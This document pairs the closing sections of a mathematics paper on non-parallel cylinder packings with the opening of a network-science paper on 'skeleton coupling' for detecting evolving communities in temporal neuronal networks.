We have \[\mathrm{dist}(\ell_{1},\ell_{2})=\frac{\left|\stackrel{{ \longrightarrow}}{{A_{1}}}\stackrel{{\longrightarrow}}{{A_{2}}} \cdot(v_{1}\times v_{2})\right|}{\|v_{1}\times v_{2}\|}\] where \(\cdot\) denotes the inner product.. We calculate: \[\left|\stackrel{{\longrightarrow}}{{A_{1}}} \stackrel{{\longrightarrow}}{{A_{2}}}\cdot(v_{1}\times v_{2}) \right|=\left|\left[\begin{matrix}x_{2}-x_{1}&y_{2}-y_{1}&0\\ y_{1}&-x_{1}&T_{1}^{\prime}\\ y_{2}&-x_{2}&T_{2}^{\prime}\end{matrix}\right]\right|\] \[=\left.-T_{1}^{\prime}\left|\left[\begin{matrix}x_{2}-x_{1}&y_{2} -y_{1}\\ y_{2}&-x_{2}\end{matrix}\right]\right|+T_{2}^{\prime}\left|\left[\begin{matrix} x_{2}-x_{1}&y_{2}-y_{1}\\ y_{1}&-x_{1}\end{matrix}\right]\right|\] \[=T_{1}^{\prime}\big{(}x_{2}^{2}+y_{2}^{2}-(x_{1}x_{2}+y_{1}y_{2}) \big{)}+T_{2}^{\prime}\big{(}d_{1}^{2}-(x_{1}x_{2}+y_{1}y_{2})\big{)}.\] Note that \(x_{1}x_{2}+y_{1}y_{2}=cd_{1}d_{2}\). Hence, by algebraic manipulation, \[\left|\stackrel{{\longrightarrow}}{{A_{1}}}\stackrel{{ \longrightarrow}}{{A_{2}}}\cdot(v_{1}\times v_{2})\right|=T_{1}^{ \prime}\big{(}d_{2}^{2}-cd_{1}d_{2}\big{)}+T_{2}^{\prime}(d_{1}^{2}-cd_{1}d_{ 2}\big{)}.\] Next, \[\|v_{1} \times v_{2}\|^{2}=\|v_{1}\|^{2}\|v_{2}\|^{2}-(v_{1}\cdot v_{2})^{ 2}=(d_{1}^{2}+{T_{1}^{\prime}}^{2})(d_{2}^{2}+{T_{2}^{\prime}}^{2})-(x_{1}x_{ 2}+y_{1}y_{2}+T_{1}^{\prime}T_{2}^{\prime})^{2}\] \[=(d_{1}^{2}+{T_{1}^{\prime}}^{2})(d_{2}^{2}+{T_{2}^{\prime}}^{2})- (cd_{1}d_{2}+T_{1}^{\prime}T_{2}^{\prime})^{2}\] \[=(1-c^{2})d_{2}^{2}(d_{1}^{2}+{T_{1}^{\prime}}^{2})+(d_{1}T_{2}^{ \prime}-cT_{1}^{\prime}d_{2})^{2}.\] Therefore, \[\text{dist}^{2}(\ell_{1},\ell_{2})=\frac{(d_{1}^{2}T_{2}^{\prime}+d_{2}^{2}T_{1}^{ \prime}-(T_{1}^{\prime}+T_{2}^{\prime})d_{1}d_{2}c)^{2}}{(1-c^{2})d_{2}^{2}(d_{1 }^{2}+{T_{1}^{\prime}}^{2})+(d_{1}T_{2}^{\prime}-cT_{1}^{\prime}d_{2})^{2}},\] so the inequality \[\text{dist}^{2}(\ell_{1},\ell_{2})\geq(1-\varepsilon)d_{1}^{2}\] which leads the desired result, is equivalent to \[\big{(}d_{1}^{2}T_{2}^{\prime}+d_{2}^{2}T_{1}^{\prime}-(T_{1}+T_{2})d_{1}d_{2 }c\big{)}^{2}\geq(1-\varepsilon)d_{1}^{2}(1-c^{2})d_{2}^{2}(d_{1}^{2}+{T_{1}^ {\prime}}^{2})+(d_{1}T_{2}^{\prime}-cT_{1}^{\prime}d_{2})^{2}. \tag{2}\] Denoting \(d_{2}=d_{1}+h\), the left-hand side of (2) takes the form \[\big{(}d_{1}^{2}T_{2}^{\prime}+d_{2}^{2}T_{1}^{\prime}-(T_{1}^{ \prime}+T_{2}^{\prime})d_{1}d_{2}c\big{)}^{2}\] \[=\big{(}d_{1}^{2}T_{2}^{\prime}+(d_{1}^{2}+2hd_{1}+h^{2})T_{1}^{ \prime}-(T_{1}^{\prime}+T_{2}^{\prime})d_{1}d_{2}c\big{)}^{2}\] \[=\big{(}T_{1}^{\prime}((1-c)d_{1}^{2}+(2-c)hd_{1}+h^{2})+T_{2}^{ \prime}(d_{1}^{2}(1-c)-hd_{1}c))\big{)}^{2}.\] We want to verify that \[|d_{1}^{2}(1-c)-hd_{1}c|\geq d_{1}^{2}.\] it suffices to show that \(|hd_{1}c|\geq|3d_{1}^{2}|\), which is equivalent to \[|c|\geq\frac{3d_{1}}{h}.\] For \(d_{1}\) large enough (since \(h>d_{1}^{50}\)) its enough that \(|c|\notin(0,\frac{1}{(d_{1}+h)^{0.975}}\)), as in our assumptions. 
Denote \[I=\big{|}T_{1}^{\prime}\big{(}(1-c)d_{1}^{2}+(2-c)hd_{1}+h^{2}\big{)}\big{|}.\] If \(I<T_{2}^{\prime}d_{1}^{2}\), then \[\big{(}T_{1}^{\prime}((1-c)d_{1}^{2}+(2-c)hd_{1}+h^{2})+T_{2}^{\prime}(d_{1}^{2}(1-c)-hd_{1}c)\big{)}^{2}\geq(T_{2}^{\prime}d_{1}^{2}-I)^{2}.\] Moreover, \[I\leq 2hd_{1}T_{1}^{\prime}+h^{2}T_{1}^{\prime}+T_{1}^{\prime}d_{1}^{2}\leq 4d_{2}^{2}T_{1}^{\prime}\leq 4\cdot 2^{4a_{k_{2}}}T_{1}^{\prime}=2^{10a_{k_{2}}}T_{1}^{\prime}\cdot\frac{4}{2^{6a_{k_{2}}}},\] while \[\frac{T_{2}^{\prime}}{T_{1}^{\prime}}\geq\frac{T_{k_{2}}}{T_{k_{2}-1}}=2^{10a_{k_{2}}},\qquad\text{so}\qquad 2^{10a_{k_{2}}}T_{1}^{\prime}\leq T_{2}^{\prime}.\] Hence \(I\leq T_{2}^{\prime}\cdot o(1)\leq T_{2}^{\prime}d_{1}^{2}\cdot o(1)\), where the \(o(1)\) term is a function of \(k_{2}\) that tends to \(0\) as \(k_{2}\to\infty\). Then, for \(k_{2}\) large enough, \[\big{(}T_{1}^{\prime}((1-c)d_{1}^{2}+(2-c)hd_{1}+h^{2})+T_{2}^{\prime}(d_{1}^{2}(1-c)-hd_{1}c)\big{)}^{2}\geq(T_{2}^{\prime}d_{1}^{2})^{2}(1-o(1))^{2}\geq\Big{(}1-\frac{\varepsilon}{2}\Big{)}(T_{2}^{\prime}d_{1}^{2})^{2}.\] Since \(d_{2}T_{1}^{\prime}=o(d_{1}T_{2}^{\prime})\), the right-hand side of (2) satisfies \[(1-\varepsilon)d_{1}^{2}\Big{(}(1-c^{2})d_{2}^{2}(d_{1}^{2}+{T_{1}^{\prime}}^{2})+(d_{1}T_{2}^{\prime}-cT_{1}^{\prime}d_{2})^{2}\Big{)}\leq(1-\varepsilon)(T_{2}^{\prime}d_{1}^{2})^{2}(1+o(1))\leq(1-0.75\varepsilon)(T_{2}^{\prime}d_{1}^{2})^{2},\] where again the \(o(1)\) term is a function of \(k_{2}\) and the last inequality holds for \(k_{2}\) large enough. It follows that \[\operatorname{dist}(\ell_{1},\ell_{2})^{2}\geq(1-\varepsilon)d_{1}^{2}\ \Rightarrow\ \operatorname{dist}(\ell_{1},\ell_{2})\geq\sqrt{1-\varepsilon}\,d_{1}\geq(1-\varepsilon)d_{1}.\]
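As a quick numerical sanity check of the distance formula used in this proof, \(\mathrm{dist}(\ell_{1},\ell_{2})=\big|\overrightarrow{A_{1}A_{2}}\cdot(v_{1}\times v_{2})\big|/\|v_{1}\times v_{2}\|\) can be evaluated directly; the following minimal sketch (using NumPy, with purely illustrative base points and stand-in values for \(T_{k_{1}},T_{k_{2}}\) that are not taken from the construction) does so:

```python
import numpy as np

def line_distance(A1, v1, A2, v2):
    """Distance between two non-parallel lines A_i + t*v_i in R^3."""
    cross = np.cross(v1, v2)
    return abs(np.dot(A2 - A1, cross)) / np.linalg.norm(cross)

# Purely illustrative values (not taken from the construction):
A1 = np.array([3.0, 4.0, 0.0])          # base point with d1 = ||A1|| = 5
A2 = np.array([40.0, 9.0, 0.0])         # base point in a "later" annulus
T1, T2 = 1.0e3, 1.0e9                   # stand-ins for T_{k_1} << T_{k_2}
v1 = np.array([A1[1], -A1[0], T1])      # direction (y1, -x1, T_{k_1})
v2 = np.array([A2[1], -A2[0], T2])      # direction (y2, -x2, T_{k_2})

d1 = np.linalg.norm(A1)
print(line_distance(A1, v1, A2, v2), d1)   # compare dist(l1, l2) with d1
```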
Then \(\big{|}|\mathscr{L}\cap S|-\mathrm{density}(\mathscr{L})\cdot\operatorname{area}(S)\big{|}\leq C(n,L,\mathscr{L})\cdot M\), where \(C(n,L,\mathscr{L})\) is a constant that depends only on the constants \(n,L\) and the lattice \(\mathscr{L}\)._ Proof.: This follows directly from [7], Theorem 2.4. **Lemma 3.5**.: _Let \(\mathscr{L}\) be a lattice in \(\mathbb{R}^{2}\) that is spanned over \(\mathbb{Z}\) by two linearly independent vectors. Let \(r>0\) and let \(\theta_{1}\) and \(\theta_{2}\) be numbers such that \(0\leq\theta_{1}<\theta_{2}\leq 2\pi\) and \(\theta_{2}-\theta_{1}\geq\frac{1}{2\sqrt{r}}\). Then in \(\mathscr{L}\cap B_{r}^{2}(0)\) there exist_ \[\mathrm{density}(\mathscr{L})\cdot\pi\cdot r^{2}\cdot\frac{\theta_{2}-\theta_{1}}{2\pi}\cdot(1+o(1))\] _points such that the angle \(\alpha(x)\) between the positive \(x\)-axis and the line that passes through such a point and the origin lies in \([\theta_{1},\theta_{2}]\). The \(o(1)\) term is bounded by a factor \(g(r)\) with \(g(r)=o(1)\) as \(r\) tends to infinity, and \(g(r)\) depends only on \(r\) and \(\mathscr{L}\), not on the specific choice of \(\theta_{1},\theta_{2}\)._ Proof.: It is easy to check that every sector of a circle of radius \(r\) (WLOG \(r\in\mathbb{N}\)) is in the class \(\mathrm{Lip}(2,10r,1)\). Then, by the previous lemma, in every sector \(C\) with angle \(\alpha\) of a circle of radius \(r\) there are \[\mathrm{density}(\mathscr{L})\cdot\pi\cdot r^{2}\cdot\frac{\alpha}{2\pi}+q\] points in \(\mathscr{L}\cap C\), where \(|q|\) is bounded by \(C(\mathscr{L})\cdot 10r\), which finishes the proof. **Theorem 3.6**.: _For every \(\varepsilon>0\) there exists \(M>0\) such that the following holds: for any \(k_{1},k_{2}>M\) and any two points \(x_{1}\in\Omega_{k_{1}}\) and \(x_{2}\in\Omega_{k_{2}}\) such that either \(k_{1}=k_{2}\) and \(\|x_{1}-x_{2}\|\geq 1\), or the pair \(x_{1},x_{2}\) satisfies condition (1) of theorem 3.2, we have_ \[\mathrm{dist}(\ell_{x_{1}},\ell_{x_{2}})\geq 1-\varepsilon.\] **Lemma 3.7**.: (Ismailescu and Laskawiec, [6]). _Let \(r,R>0\), \(A_{1}=(x_{1},y_{1},0)\), \(A_{2}=(x_{2},y_{2},0)\). Assume \(\|A_{1}A_{2}\|\geq 2r\), \(\|A_{1}\|\leq R\) and \(\|A_{2}\|\leq R\). Let \(\ell_{i}\) denote the straight line that passes through \(A_{i}\) and has the direction vector \(v_{i}=(y_{i},-x_{i},T)\), where \(8r^{2}T\geq R^{4}\), \(i=1,2\). Then_ \[\mathrm{dist}(\ell_{1},\ell_{2})\geq 2r\Big{(}1-\frac{1}{T}\Big{)}.\] A proof of this lemma can be found in [6], Lemma 2.1. Proof of theorem 3.6.: By theorem 3.2, there exists \(k_{0}\) such that for every \(k_{1},k_{2}>k_{0}\) with \(k_{1}\neq k_{2}\), and every \(x_{1}\in\Omega_{k_{1}}\), \(x_{2}\in\Omega_{k_{2}}\) which satisfy (1), the assertion is true. Therefore, we need to find \(M^{\prime}=M^{\prime}(\varepsilon)\) such that the assertion holds true for every \(k>M^{\prime}\) and \(x_{1}\neq x_{2}\in\Omega_{k}\). Now, for every \(k\in\mathbb{N}\) and every point \(x\in\Omega_{k}\), \(\|x\|\leq 2^{2a_{k}}\), and for every point \(y\in\Omega_{k}\), \(y\neq x\), with \(\|x-y\|\geq 1=2\cdot\frac{1}{2}\), choose \(r=\frac{1}{2}\) and \(R=2^{2a_{k}}\). Then \(8r^{2}T_{k}=2T_{k}\geq 2^{10a_{k}}\geq 2^{8a_{k}}=R^{4}\). Hence, by lemma 3.7, \(\operatorname{dist}(\ell_{1},\ell_{2})\geq 2\cdot\frac{1}{2}\cdot(1-\frac{1}{T_{k}})=1-\frac{1}{T_{k}}\), and since \(T_{k}\to\infty\) as \(k\to\infty\), there exists \(M^{\prime}=M^{\prime}(\varepsilon)\) such that for every \(k>M^{\prime}\), \(1-\frac{1}{T_{k}}\geq 1-\varepsilon\). This implies that \(\operatorname{dist}(\ell_{1},\ell_{2})\geq 1-\varepsilon\).
Proof of theorem 3.3.: Construction: Let \(\varepsilon>0\), and let \(M=M(\varepsilon)\) be the constant whose existence is asserted in theorem 3.6. For every \(k\geq M\) define the set \(\widetilde{\Omega_{k}}\) recursively by 1. \(\widetilde{\Omega_{M}}=\Omega_{M}\cap\mathscr{L}\). 2. For every \(k>M\), \(\widetilde{\Omega_{k}}\) is the set of all points in \(\Omega_{k}\cap\mathscr{L}\) that satisfy (1) with all the points in \(\bigcup_{i=M}^{k-1}\widetilde{\Omega_{i}}\). By lemma 3.5 and the Taylor expansion of the cosine function around \(\frac{\pi}{2}\), for every \(x\in\bigcup_{i=M}^{k-1}\widetilde{\Omega_{i}}\) there exist at most \(b\cdot\frac{1}{2^{\cdot 0.975a_{k}}}\cdot(2^{2a_{k}})^{2}\) points in \(\Omega_{k}\cap\mathscr{L}\) such that the absolute value of the cosine of the angle between the line that passes through the point and the origin and the line that passes through \(x\) and the origin lies in the range \(I=[0,\frac{1}{2^{0.975a_{k}}})\) where b is a constant (clearly that all the others satisfy (1) with x). Since \(\bigcup_{i=M}^{k-1}\widetilde{\Omega_{i}}\subseteq B_{2^{2a_{k-1}}}(0)\), there exist M', such that for every \(k>M^{\prime}\) there exist at most \[|\bigcup_{i=M}^{k-1}\widetilde{\Omega_{i}}| \leq|B_{2^{2a_{k-1}}}(0)\cap\mathscr{L}|\] \[\leq(\operatorname{density}(\mathscr{L})+0.01)\cdot\pi\cdot(2^{2a _{k-1}})^{2}\leq\left(\frac{4}{\sqrt{12}}+0.01\right)\cdot\pi\cdot 2^{4a_{k-1}}\] \[\leq 10\cdot 2^{4a_{k-1}}\] points in \(\bigcup_{i=M}^{k-1}\widetilde{\Omega_{i}}\). (\(\frac{4}{\sqrt{12}}\) is the maximal density of a lattice in the plane which satisfy that the distance between every \(2\) points on the lattice is at least \(1\), see [1]). Then for every \(k>\max\left\{M,M^{\prime}\right\}\) there are at most \[b\cdot\frac{1}{2^{0.975a_{k}}}\cdot(2^{2a_{k}})^{2}\cdot 10\cdot 2^{4a_{k-1}}=10b \cdot 2^{3.065a_{k}}\] points in \(\Omega_{k}\cap\mathscr{L}\) which don't satisfy (1) with some point in \(\bigcup_{i=M}^{k-1}\widetilde{\Omega_{i}}\). We define \(\widetilde{\Omega_{k}}\) to be the set of all points in \(\Omega_{k}\cap\mathscr{L}\) without these points. Now for every point in \(\widetilde{\Omega_{k}}\) we will construct a cylinder with axis \((x,y,0)+t(y,-x,T_{k})\) and radius \(\frac{1}{2}\cdot\left(1-\varepsilon\right)\). By theorem 3.2, it is a cylinder packing, and by lemma 3.1 it is non-parallel cylinder packing. denote the cylinder packing by \(C\). Since \[\lim_{k\to\infty}\frac{10b\cdot 2^{3.065a_{k}}}{\text{Area}\big{(}B_{2^{2a_{k}} }^{2}(0)\big{)}}=0,\] the points we remove will not affect the density of the dual circle packing \(\widetilde{\mathcal{C}}\). Then, by lemma 2.3, it is readily concluded that \(\delta^{+}(\mathcal{C})\geq\frac{\pi}{4}\cdot\left(1-\varepsilon\right)^{2} \cdot density(\mathscr{L})\), which finishes the proof. **Theorem 3.8**.: _For every lattice \(\mathcal{L}\), there exist a non-parallel cylinder packing \(\mathcal{C}=\{C_{i}\}_{i=1}^{\infty}\) such that:_ 1. _For any cylinder in_ \(\mathcal{C}\)_, the intersection of its axis with the_ \((x,y)\)_-plane lies in_ \(\mathcal{L}\)_._ 2. _The upper density of_ \(\mathcal{C}\) _is at least_ \(\text{density}(\mathcal{L})\cdot\frac{\pi}{4}\)_._ Proof.: Let \(\varepsilon_{n}=\frac{1}{n}\), for every \(n\geq 10\). Let \(k_{0}\), \(t_{n}=M^{\prime}(\varepsilon_{n})\) be the constants whose existence is asserted in theorem 3.2 (WLOG, \(t_{n}\) is monotonic increasing and \(t_{10}\geq k_{0}\)). Let \(p_{n}\) be the constant whose existence is asserted in theorem 3.6. 
Define \(m_{n}=max(\{p_{n},t_{n}\})\). Now, for every \(k\geq m_{10}\) define the set \(\widetilde{\Omega_{k}}\) recursively by 1. \(\widetilde{\Omega_{m_{10}}}=\Omega_{m_{10}}\cap\mathscr{L}\). 2. For every \(k>m_{10}\), \(\widetilde{\Omega_{k}}\) is the set of all points in \(\Omega_{k}\cap\mathscr{L}\) that satisfy (1) with all the points in \(\bigcup_{i=m_{10}}^{k-1}\widetilde{\Omega_{i}}\). By the same calculation of theorem 3.3, the points we remove don't affect about the density of the set of the points on the \((x,y)\)-plane that we choose. For every \(k\geq m_{10}\), \((x_{1},y_{1},0)\in\widetilde{\Omega_{k}}\), we take the axis \(\ell_{x}=\{(x_{1},y_{1},0)+t(y_{1},-x_{1},T_{k}):t\in\mathbb{R}\}\). Now, for every \(n\geq 10\), and for every \(k_{2}\geq k_{1}\geq m_{10}\) such that \(k_{2}\geq m_{n}\), for every \(x_{1}\in\widetilde{\Omega_{k_{1}}}\), \(x_{2}\in\widetilde{\Omega_{k_{2}}}\) define \(\ell_{1}=\ell_{x1}\), \(\ell_{2}=\ell_{x2}\) 1. If \(k_{1}=k_{2}\), then \(\text{dist}(\ell_{1},\ell_{2})\geq 1-\varepsilon_{n}\) 2. If \(k_{2}\neq k_{1}\) (without loss of generality we can assume that \(k_{2}>k_{1}\)) and if \(x_{1},x_{2}\) satisfy (1), then \(\text{dist}(\ell_{1},\ell_{2})\geq(1-\varepsilon_{n})d_{1}\), when \(d_{1}=\|x_{1}\|\). Now, take \(m_{10},m_{11}\) which are suitable for \(\varepsilon_{10}\), \(\varepsilon_{11}\) respectively (without loss of generality, we can assume that \(m_{11}>m_{10}\)). For every \(m_{10}\leq k<m_{11}\), and for every \(x\in\Omega_{k}\), take \(x^{\prime}=\frac{1}{1-\varepsilon_{10}}\cdot x\), and let \(\ell_{x^{\prime}}\) be the line that passes through \(x^{\prime}\) and has the same direction vector as \(\ell_{x}\). Note that \(\ell_{x^{\prime}}=\frac{1}{1-\varepsilon_{10}}\cdot\ell_{x}\). Then, take \(m_{11},m_{12}\) which are suitable for \(\varepsilon_{11}\), \(\varepsilon_{12}\) respectively (without loss of generality, we can assume that \(m_{12}>m_{11}\)). For every \(m_{11}\leq k<m_{12}\), and for every \(x\in\Omega_{k}\) take \(x^{\prime}=\frac{1}{1-\varepsilon_{11}}\cdot x\), let \(\ell_{x^{\prime}}\) be the line that passes through \(x^{\prime}\) and has the same direction vector as \(\ell_{x}\). Again, note that that \(\ell_{x^{\prime}}=\frac{1}{1-\varepsilon_{11}}\cdot\ell_{x}\). Then take \(m_{12},m_{13}\) which are suitable for \(\varepsilon_{12}\), \(\varepsilon_{13}\), and so on. Again, we don't affect the density of the set of the points that we choose. Now consider the collection \(\mathcal{C}\) of all the cylinders of radius \(\frac{1}{2}\) and with axes of the form \(\ell_{x^{\prime}}\). We claim that this collection is a cylinder packing Indeed, 1. If \(x_{1},x_{2}\in\Omega_{k}\) for some \(k\in\mathbb{N}\), then, by theorem 3.6, \(\mathrm{dist}(\ell_{x^{\prime}_{1}},\ell_{x^{\prime}_{2}})\geq 1\). 2. 
If \(x_{1}\in\Omega_{k_{1}}\) and \(x_{2}\in\Omega_{k_{2}}\) with \(k_{1}\neq k_{2}\), then \[\mathrm{dist}(\ell_{x^{\prime}_{1}},\ell_{x^{\prime}_{2}})= \mathrm{dist}(\frac{1}{1-\varepsilon_{k_{1}}}\ell_{x_{1}},\frac{1}{1-\varepsilon_{k_{2}}}\ell_{x_{2}})\] \[=\mathrm{dist}(\frac{1}{1-\varepsilon_{k_{2}}}\cdot\frac{1-\varepsilon_{k_{2}}}{1-\varepsilon_{k_{1}}}\ell_{x_{1}},\frac{1}{1-\varepsilon_{k_{2}}}\ell_{x_{2}})=\frac{1}{1-\varepsilon_{k_{2}}}\mathrm{dist}(\frac{1-\varepsilon_{k_{2}}}{1-\varepsilon_{k_{1}}}\ell_{x_{1}},\ell_{x_{2}})\] \[\geq\mathrm{dist}(\ell_{x_{1}},\ell_{x_{2}})-\left|\frac{1-\varepsilon_{k_{2}}}{1-\varepsilon_{k_{1}}}-1\right|d_{1}\geq 0.9d_{1}-0.2d_{1}=0.7d_{1}\geq 1.\] So the collection \(\mathcal{C}\) is a cylinder packing, and by lemma 3.1 it is a non-parallel cylinder packing. By lemma 2.3, its upper density is at least \(\frac{\pi}{4}\cdot\mathrm{density}(\mathscr{L})\). **Corollary 3.9**.: _There exists a non-parallel cylinder packing \(\mathcal{C}=\{C_{i}\}_{i=1}^{\infty}\) with \(\delta^{+}(\mathcal{C})=\frac{\pi}{\sqrt{12}}\)._ Proof.: If we take \(\mathscr{L}\) to be the hexagonal lattice, then there exists a cylinder packing \(\mathcal{C}\) such that, on the one hand, \(\delta^{+}(\mathcal{C})\geq\frac{\pi}{\sqrt{12}}\), and on the other hand (see [2]), \(\delta^{+}(\mathcal{C})\leq\frac{\pi}{\sqrt{12}}\). Thus, \(\delta^{+}(\mathcal{C})=\frac{\pi}{\sqrt{12}}\), as desired. ## 4 Conclusions and directions for future study In this paper we showed that the maximal value of \(\delta^{+}\) and \((\delta^{*})^{+}\) for a non-parallel cylinder packing is \(\frac{\pi}{\sqrt{12}}\), and that for every \(\varepsilon>0\) there exists a non-parallel cylinder packing \(\mathcal{C}=\{C_{i}\}_{i=1}^{\infty}\) with \(\delta^{-}(\mathcal{C})>\frac{\pi}{6}-\varepsilon\). One interesting question is what the maximal value of \(\delta^{-}\) is for non-parallel cylinder packings (or the supremum, if the maximum does not exist), and whether the bound of \(\frac{\pi}{\sqrt{12}}\) can be achieved. Another interesting question is whether there exists a non-parallel cylinder packing \(\mathcal{C}=\{C_{i}\}_{i=1}^{\infty}\) with \((\delta^{*})^{-}(\mathcal{C})>0\). **Acknowledgments** This paper is based on my M.Sc thesis at Tel Aviv University under the supervision of Prof. Barak Weiss. I am deeply grateful to Prof. Barak Weiss, whose experience and guidance have enriched me. His insights and advice were indispensable for this work. I would also like to thank Andrei Lacob for dedicating his time to review this work and providing helpful comments. This research was supported by the Israel Science Foundation, grant 2919/19.
2301.10860
Skeleton coupling: a novel interlayer mapping of community evolution in temporal networks
Dynamic community detection (DCD) in temporal networks is a complicated task that involves the selection of a method and its associated hyperparameters. How to choose the most appropriate method generally depends on the type of network being analyzed and the specific properties of the data that define the network. In functional temporal networks derived from neuronal spike train data, communities are expected to be transient, and it is common for the network to contain multiple singleton communities. Here, we compare the performance of different DCD methods on functional temporal networks built from synthetic neuronal time series data with known community structure. We find that, for these networks, DCD methods that utilize interlayer links to perform community carryover between layers outperform other methods. However, we also observe that DCD performance is highly dependent on the topology of interlayer links, especially in the presence of singleton and transient communities. We therefore define a novel way of defining interlayer links in temporal networks called skeleton coupling that is specifically designed to enhance the linkage of communities in the network throughout time based on the topological properties of the community history. We show that integrating skeleton coupling with current DCD methods improves the method's performance in synthetic data with planted singleton and transient communities. The use of skeleton coupling to perform DCD will therefore allow for more accurate and interpretable results of community evolution in real-world neuronal data or in other systems with transient structure and singleton communities.
Bengier Ülgen Kilic, Sarah Feldt Muldoon
2023-01-25T22:46:42Z
http://arxiv.org/abs/2301.10860v2
# Skeleton coupling: a novel interlayer mapping of community evolution in temporal networks ###### Abstract Dynamic community detection (DCD) in temporal networks is a complicated task that involves the selection of an algorithm and its associated parameters. How to choose the most appropriate algorithm generally depends on the type of network being analyzed and the specific properties of the data that define the network. In functional temporal networks derived from neuronal spike train data, communities are expected to be transient, and it is common for the network to contain multiple singleton communities. Here, we compare the performance of different DCD algorithms on functional temporal networks built from synthetic neuronal time series data with known community structure. We find that, for these networks, DCD algorithms that utilize interlayer links to perform community carryover between layers outperform other methods. However, we also observe that algorithm performance is highly dependent on the topology of interlayer links, especially in the presence of singleton and transient communities. We therefore define a novel method for defining interlayer links in temporal networks called skeleton coupling that is specifically designed to enhance the linkage of communities in the network throughout time based on the topological properties of the community history. We show that integrating skeleton coupling with current DCD methods improves algorithm performance in synthetic data with planted singleton and transient communities. The use of skeleton coupling to perform DCD will therefore allow for more accurate and interpretable results of community evolution in real-world neuronal data or in other systems with transient structure and singleton communities. Introduction Complex systems are often composed of elements whose dynamics and interactions can change over time. Such temporal events might describe human communication [1], proximity [2; 3; 4], trade and transportation [5; 6], citation and collaboration [7; 8], or biological [9; 10] and neuronal interactions [11; 12]. Modeling these systems as temporal networks [13; 14] can be useful, as network nodes and edges can capture temporal properties of the data. This is particularly relevant for systems with nodes whose dynamics can be represented using time series data. Neuronal systems are a prime example of a dynamic system that can be modeled as a temporal network. For example, spike train data describes the simultaneous firing patterns of neurons over time. Thus, one can build a network whose nodes are neurons and whose edges represent statistical relationships (such as synchronization or some other similarity measure) between the firing patterns of neurons. In order to capture the fact that interactions between pairs of neurons will change over time, a common way of building a temporal network with this data is to create sequential snapshots of the network over time that describe the dynamic evolution of the data. To do this, one can split the time series into smaller time series, construct chronologically ordered set of network states, and try to characterize the intrinsic patterns of connectivity across those individual snapshots (Fig.1A). One aspect of temporal networks that is often of interest to study is the dynamic properties of communities within the network over time. 
In our example of neuronal firing, communities could represent synchronized groups of neurons, and we could ask how the membership of such groups changes over time. Multiple dynamic community detection (DCD) algorithms have been developed that extend static community detection to temporal networks, where now communities can exist (and be created/die) across time [15]. However, similar to the case of static networks, each DCD algorithm is based on a slightly different definition of how communities are detected within the network. Further, DCD algorithms must also include a definition of how to properly carry-over or assign community labels across snapshots (layers of the network). As a result, DCD algorithms in the literature vary greatly depending on their treatment of the snapshots and their temporal dependence [16]. Some algorithms treat individual snapshots separately, others might iterate over the snapshots in chronological order, and some might use interlayer edges to link the snapshots over time into a temporally connected network. Here, we focus on five commonly used DCD algorithms that span the different ways of defining dynamic communities: Multilayer modularity maximization (MMM) [17], Infomap [18; 19], Dynamic stochastic block model (DSBM) [20; 21], Dynamic plex propagation method (DPPM) [22], and Tensor Factorization [23]. MMM and DSBM define a community as a densely connected cluster of nodes with respect to a null model, whereas Infomap defines a community as a group of nodes in which information flows quickly and efficiently. DPPM utilizes a definition in which communities are groups of subsets (plexes) of fully connected subgraphs (cliques) that have maximal overlap. Finally, Tensor Factorization takes an approach from linear algebra and defines the communities as the bases of a vector space generating the underlying network. This variance in the definitions of a dynamic community forces these algorithms to make specific assumptions about how to temporally carry-over community labels across snapshots (layers) (Fig.1B). Algorithms like MMM and Infomap operate on the idea that temporal carry-over is performed through the structural multilayer network topology; in this case 'interlayer edges' are defined that link nodes across layers, such that communities can naturally exist across time. However, the other three algorithms use 'fixed rules' to define temporal carry-over that ignore data-specific differences. DSBM uses a fixed generative model for the temporal network in which communities are created and transferred across time via a Bayesian method. DPPM uses a fixed algorithm in which plexes in static layers are carried over across time if they intersect sufficiently between snapshots. Finally, Tensor Factorization utilizes a fixed factorization technique (PARAFAC) that splits the 3-way tensor into simpler matrices in which the time component of the factorization corresponds to the temporal carry-over. Importantly, because of the different ways in which each algorithm defines a community, both statically and dynamically, different algorithms will emphasize different features of the data and therefore will detect different patterns of dynamic communities. It is therefore essential to have an understanding of how each algorithm detects the specific features of the data and incorporates this information into the detected communities. 
This is especially relevant in order to interpret any results when these algorithms are applied to experimental data sets where the underlying ground truth is not known. Motivated by our example from neuroscience, here we are especially interested in how various DCD algorithms perform to detect data with a high presence of singleton communities (independently firing neurons) and transient communities (cell assemblies that change over time with the state of the brain). We therefore simulate spike train data with known community structure and test the performance of DCD algorithms on this data. As expected, we find that different algorithms detect different patterns of dynamic community structure for the same data set. Algorithms that incorporate interlayer edges to link snapshots over time perform better at detecting singleton and transient communities in our simulated data, but all algorithms struggle to correctly perform temporal carry-over of community labels. We find that the topology of how interlayer links are defined in these temporal networks can greatly influence the performance of the algorithm. The most common method of interlayer coupling, called diagonal coupling, in which network nodes are linked to themselves in sequential layers, performs poorly at properly assigning the carry-over of community labels in our data. However, we find that by utilizing information about the _intralayer_ topology of each individual layer in the network to couple the layers, one can improve algorithm performance. Using methods from topological data analysis (TDA), a field in the intersection of data science and algebraic topology in mathematics [24; 25; 26; 27], we define a novel interlayer coupling method called skeleton coupling that defines interlayer edges based on the community information within the static layers of temporal networks. Skeleton coupling takes the temporal neighborhood history and community assignment of a vertex (in the adjacent past state) into account such that DCD algorithms robustly and correctly capture the temporal carry-over of both singleton communities and larger assemblies. We compare our results for skeleton coupling with previously proposed mechanisms of interlayer coupling and show that skeleton coupling outperforms other methods on data with a high prevalence of singleton and transient communities. ## II Simulation of neuronal data As previously mentioned, this work is motivated by applications for studying temporal functional networks built from firing patterns of individual neurons. However, because in such data the ground truth of community evolution cannot be known, here we apply our analysis to synthetic data. Although previous work studying community evolution has designed benchmark networks for testing community detection in evolving networks [28; 29; 30; 31], the links in these networks represent structural (as opposed to functional) connections between nodes. As such, these benchmark models do not generally contain singleton communities or highly transient communities as commonly seen in functional networks based on correlation data [32; 33; 34]. We therefore designed a set of functional benchmark networks built from correlations between simulated neuronal spike trains. In our numerical experiments, we study two different types of community events expected to be present in dynamic functional networks: monotonic and non-monotonic events. 
